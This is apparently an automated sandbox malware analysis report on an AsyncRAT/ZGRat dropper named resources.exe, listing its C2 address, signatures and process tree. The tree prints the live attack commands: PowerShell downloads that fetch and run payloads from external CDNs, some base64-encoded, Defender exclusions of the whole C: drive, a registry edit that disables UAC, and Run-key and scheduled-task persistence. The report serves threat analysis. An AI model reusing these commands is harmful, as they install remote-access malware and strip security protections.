Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/11/2023, 10:45

General

  • Target

    resources.exe

  • Size

    65KB

  • MD5

    693a87312aa1f6a31906187bda5293df

  • SHA1

    aaf236f3c5e791bd4f98d2c12758ff251c3b8474

  • SHA256

    f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

  • SHA512

    1c6e618ddb11d438286a032e6acd79fcb5fd89efa4fd2f3b1b4ae91785ac4a7ef8b894b910cd8394225118974e7a19aeb337313273cda2d2b0d9923cb3a212e2

  • SSDEEP

    1536:dfHn5T82s45tlDqwIdvKKBLutvfFoV/XUuL:dfH5TZsYnjIdbCNNoV/Xt

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WinDefault

C2

46.1.103.69:4263

Mutex

WinDefault

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

OperaCert

C2

46.1.103.69:7355

Mutex

OperaCert

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect ZGRat V1 31 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 14 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 16 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\resources.exe
    "C:\Users\Admin\AppData\Local\Temp\resources.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4448
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4136
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1148
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3160
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5084
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4740
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4456
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5104
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 2
        3⤵
        • Delays execution with timeout.exe
        PID:768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2980
      • C:\Users\Public\Music\RunNihaiersion.exe
        RunNihaiersion.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2184
          • C:\Windows\SysWOW64\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1640
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 session
              6⤵
                PID:2552
            • C:\Users\Public\Music\israil.exe
              "C:\Users\Public\Music\israil.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4504
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:820
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4472
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2696
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4164
                • C:\Users\Admin\AppData\Local\Temp\xx.exe
                  xx.exe
                  7⤵
                  • Executes dropped EXE
                  PID:684
                  • C:\Windows\system32\cmd.exe
                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
                    8⤵
                      PID:1856
                      • C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
                        C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        PID:4456
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"
                          10⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:408
                          • C:\Users\Admin\AppData\Roaming\2WinDefault.exe
                            "C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
                            11⤵
                            • Executes dropped EXE
                            PID:6088
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 808
                              12⤵
                              • Program crash
                              PID:4584
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
                      8⤵
                        PID:5100
                        • C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
                          C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
                          9⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:2148
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"
                            10⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2880
                            • C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
                              "C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
                              11⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5896
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                12⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2744
                      • C:\Windows\system32\cmd.exe
                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
                        8⤵
                          PID:2672
                          • C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
                            C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:376
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"
                              10⤵
                              • Blocklisted process makes network request
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3148
                              • C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
                                "C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
                                11⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:5892
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  #cmd
                                  12⤵
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2212
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
                                    13⤵
                                    • Adds Run key to start application
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1340
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    13⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1132
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    13⤵
                                      PID:4140
                          • C:\Windows\system32\cmd.exe
                            "cmd" /C C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
                            8⤵
                              PID:4836
                              • C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
                                C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
                                9⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:2000
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="
                                  10⤵
                                  • Blocklisted process makes network request
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4992
                                  • C:\Users\Admin\AppData\Roaming\OperaCrt.exe
                                    "C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
                                    11⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5492
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
                                      12⤵
                                      • Adds Run key to start application
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:452
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      #cmd
                                      12⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5860
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                      12⤵
                                        PID:2084
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                          13⤵
                                          • Creates scheduled task(s)
                                          PID:5104
                              • C:\Windows\system32\cmd.exe
                                "cmd" /C C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
                                8⤵
                                  PID:3352
                                  • C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
                                    C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
                                    9⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    PID:544
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="
                                      10⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5124
                                      • C:\Users\Admin\AppData\Roaming\WiDefault.exe
                                        "C:\Users\Admin\AppData\Roaming\WiDefault.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5400
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
                                          12⤵
                                          • Adds Run key to start application
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5512
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                          12⤵
                                            PID:5516
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                              13⤵
                                              • Creates scheduled task(s)
                                              PID:1636
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            #cmd
                                            12⤵
                                              PID:5584
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              #cmd
                                              12⤵
                                                PID:5600
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                #cmd
                                                12⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5636
                                      • C:\Windows\system32\cmd.exe
                                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
                                        8⤵
                                          PID:4444
                                          • C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
                                            C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
                                            9⤵
                                            • Drops startup file
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2076
                                        • C:\Windows\system32\cmd.exe
                                          "cmd" /C C:\Users\Admin\AppData\Local\Temp\zhXaQqWy8P.exe
                                          8⤵
                                            PID:2520
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 8
                                  3⤵
                                  • Delays execution with timeout.exe
                                  PID:2580
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
                                  3⤵
                                  • Blocklisted process makes network request
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1936
                                • C:\Users\Public\Music\RunihaiVersion.exe
                                  RunihaiVersion.exe
                                  3⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:376
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3680
                                    • C:\Windows\SysWOW64\net.exe
                                      net session
                                      5⤵
                                        PID:2456
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 session
                                          6⤵
                                            PID:2880
                                        • C:\Users\Public\Music\israil2.exe
                                          "C:\Users\Public\Music\israil2.exe"
                                          5⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          PID:3872
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
                                            6⤵
                                              PID:2604
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                7⤵
                                                • UAC bypass
                                                • Modifies registry key
                                                PID:4080
                                  • C:\Windows\system32\OpenWith.exe
                                    C:\Windows\system32\OpenWith.exe -Embedding
                                    1⤵
                                    • Modifies registry class
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2808
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6088 -ip 6088
                                    1⤵
                                      PID:5208
                                    • C:\Windows\system32\rundll32.exe
                                      "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
                                      1⤵
                                        PID:2344
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                                        1⤵
                                        • Suspicious use of AdjustPrivilegeToken
